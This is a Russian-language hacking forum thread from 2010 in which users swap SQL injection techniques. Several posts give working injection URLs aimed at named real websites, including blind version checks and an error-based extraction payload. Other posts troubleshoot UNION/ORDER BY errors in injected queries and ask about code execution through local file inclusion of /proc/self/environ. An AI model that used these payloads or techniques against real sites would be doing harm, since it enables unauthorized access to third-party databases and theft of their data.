ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13071  
Старый 11.05.2010, 00:23
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

2BrainDeaD
http://www.colorlines.com/article.php?ID=681+and+substring(@@version,1,1)=4+--
крути как блинд
 
Ответить с цитированием

  #13072  
Старый 11.05.2010, 00:34
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(),1,1)=4

2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version(),1,1)=5
 
Ответить с цитированием

  #13073  
Старый 11.05.2010, 00:46
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
#1221 - Incorrect usage of UNION and ORDER BY
как бороться?
limit , второй параметр...
 
Ответить с цитированием

  #13074  
Старый 11.05.2010, 00:54
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

2Strilo4ka дай посмотреть плз
 
Ответить с цитированием

  #13075  
Старый 11.05.2010, 00:57
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от Bb0y  
2Strilo4ka дай посмотреть плз
двиг 102 атрибута, и второй параметр в лимите.
не скажу.

up

вот:
Цитата:
(SELECT 1 FROM (select 1 union select 2)x order by 1 limit 0,1) union (select 1)
Showing rows 0 - 0 (1 total, Query took 0.0009 sec)
Цитата:
SELECT 1 FROM (select 1 union select 2)x order by 1 limit 0,1 union select 1
#1221 - Incorrect usage of UNION and ORDER BY

Понятно что скобки, то не поставить... Идеи?

Последний раз редактировалось Strilo4ka; 11.05.2010 в 01:06..
 
Ответить с цитированием

  #13076  
Старый 11.05.2010, 01:13
Аватар для BrainDeaD
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(),1,1)=4

2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version(),1,1)=5
странно, 1 и 3 ничего не выводит, или я что-то недопонял.
 
Ответить с цитированием

  #13077  
Старый 11.05.2010, 01:29
Аватар для DIEZalok
DIEZalok
Новичок
Регистрация: 22.01.2009
Сообщений: 11
Провел на форуме:
114084

Репутация: 3
По умолчанию

Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).

Объясните, почему?
 
Ответить с цитированием

  #13078  
Старый 11.05.2010, 01:29
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

2BrainDeaD, прочти сначала о blind sql injection https://forum.antichat.ru/thread35207-blind+sql+injection.html
https://forum.antichat.ru/thread18552-blind+sql+injection.html

Последний раз редактировалось Bb0y; 11.05.2010 в 01:33..
 
Ответить с цитированием

  #13079  
Старый 11.05.2010, 01:34
Аватар для BrainDeaD
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

спасибо. у меня ещё много недочётов в знаниях. будем исправляться.
 
Ответить с цитированием

  #13080  
Старый 11.05.2010, 14:22
Аватар для Анжелика
Анжелика
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
208349

Репутация: 82
По умолчанию

Цитата:
Сообщение от v1d0qz  
Это фильтрация. Если я включу эту опцию, чтобы закрыть возможность провести инжу в запросе, хотя это и не совсем полный подход, но это все равно будет фильтрация.
Фильтрация - удаление взвешенного вещества из массы воды путем прохождения через слой пористого материала или через сетки с подходящим размером отверстий.

Грубо говоря, если мы имеем ввиду компьютерную тематику в общем, и хек тематику в частности, фильтрация - удаление символов. Меджик квотс ничего не удаляет, она экранирует
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ